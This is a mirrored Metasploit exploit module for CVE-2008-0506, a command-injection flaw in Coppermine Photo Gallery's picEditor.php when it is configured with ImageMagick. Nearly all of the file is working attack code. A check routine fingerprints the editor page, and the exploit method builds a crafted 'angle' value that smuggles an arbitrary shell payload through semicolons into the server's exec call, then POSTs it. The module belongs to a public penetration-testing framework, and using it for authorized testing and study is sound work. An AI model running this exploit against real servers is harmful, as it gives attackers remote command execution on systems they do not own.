Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/webapp/coppermine_piceditor.rb
19812 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Coppermine Photo Gallery picEditor.php Command Execution',

16
        'Description' => %q{

17
          This module exploits a vulnerability in the picEditor.php script of

18
          Coppermine Photo Gallery versions 1.4.14 and earlier. When configured to

19
          use the ImageMagick library, the 'quality', 'angle', and 'clipval'

20
          parameters are not properly escaped before being passed to the PHP

21
          'exec' command.

22


23
          In order to reach the vulnerable 'exec' call, the input must pass

24
          several validation steps.

25


26
          The vulnerabilities actually reside in the following functions:

27


28
          image_processor.php: rotate_image(...)

29
          include/imageObjectIM.class.php: imageObject::cropImage(...)

30
          include/imageObjectIM.class.php: imageObject::rotateImage(...)

31
          include/imageObjectIM.class.php: imageObject::resizeImage(...)

32
          include/picmgmt.inc.php: resize_image(...)

33


34
          NOTE: Use of the ImageMagick library is a non-default option. However, a

35
          user can specify its use at installation time.

36
        },

37
        'Author' => [

38
          'Janek Vind', # original discovery/exploit

39
          'jduck' # metasploit version

40
        ],

41
        'License' => MSF_LICENSE,

42
        'References' => [

43
          [ 'CVE', '2008-0506' ],

44
          [ 'OSVDB', '41676' ],

45
          [ 'EDB', '5019' ],

46
          [ 'URL', 'http://forum.coppermine-gallery.net/index.php?topic=50103.0' ]

47
        ],

48
        'Privileged' => true, # web server context

49
        'Payload' => {

50
          'DisableNops' => true,

51
          'BadChars' => '\'', # input gets passed to htmlentities

52
          'Space' => 1024,

53
        },

54
        'Platform' => [ 'unix' ],

55
        'Arch' => ARCH_CMD,

56
        'Targets' => [[ 'Automatic', {}]],

57
        'DisclosureDate' => '2008-01-30',

58
        'DefaultTarget' => 0,

59
        'Notes' => {

60
          'Reliability' => UNKNOWN_RELIABILITY,

61
          'Stability' => UNKNOWN_STABILITY,

62
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

63
        }

64
      )

65
    )

66


67
    register_options(

68
      [

69
        OptString.new('URI', [ true, "Coppermine directory path", "/cpg1414" ]),

70
      ]

71
    )

72
  end

73


74
  def check

75
    res = send_request_raw({

76
      'uri' => normalize_uri(datastore['URI'], '/picEditor.php')

77
    }, 25)

78


79
    if (res and res.body =~ /Coppermine Picture Editor/i)

80
      return Exploit::CheckCode::Appears

81
    end

82


83
    return Exploit::CheckCode::Safe

84
  end

85


86
  def exploit

87
    valid_imgs = %w{

88
      thumb_audio.jpg thumb_avi.jpg thumb_doc.jpg thumb_document.jpg thumb_gz.jpg

89
      thumb_htm.jpg thumb_html.jpg thumb_mid.jpg thumb_midi.jpg thumb_mov.jpg thumb_movie.jpg

90
      thumb_mp3.jpg thumb_mpeg.jpg thumb_mpg.jpg thumb_nopic.jpg thumb_ogg.jpg thumb_pdf.jpg

91
      thumb_private.jpg thumb_qtv.jpg thumb_ra.jpg thumb_ram.jpg thumb_rar.jpg thumb_rm.jpg

92
      thumb_rmj.jpg thumb_swf.jpg thumb_txt.jpg thumb_wav.jpg thumb_wma.jpg thumb_wmv.jpg

93
      thumb_xls.jpg thumb_zip.jpg

94
    }

95
    img = '../../images/' + valid_imgs[rand(valid_imgs.length)]

96
    # suppress errors from convert

97
    angle = rand_text_numeric(1 + rand(8)) + ' -quiet 1 2'

98
    # and exec our cmd :)

99
    angle += ';' + payload.encoded + ';#'

100


101
    res = send_request_cgi({

102
      'method' => 'POST',

103
      'uri'	=> normalize_uri(datastore['URI'], "/picEditor.php"),

104
      'vars_post' =>

105
        {

106
          'angle' => angle,

107
          'quality' => '50', # not required, but fixes an error message

108
          'newimage' => img

109
        }

110
    }, 25)

111


112
    if (res and res.code == 200)

113
      print_good("Successfully POST'd exploit data")

114
    else

115
      fail_with(Failure::Unknown, "Error POSTing exploit data")

116
    end

117


118
    handler

119
  end

120
end

121


122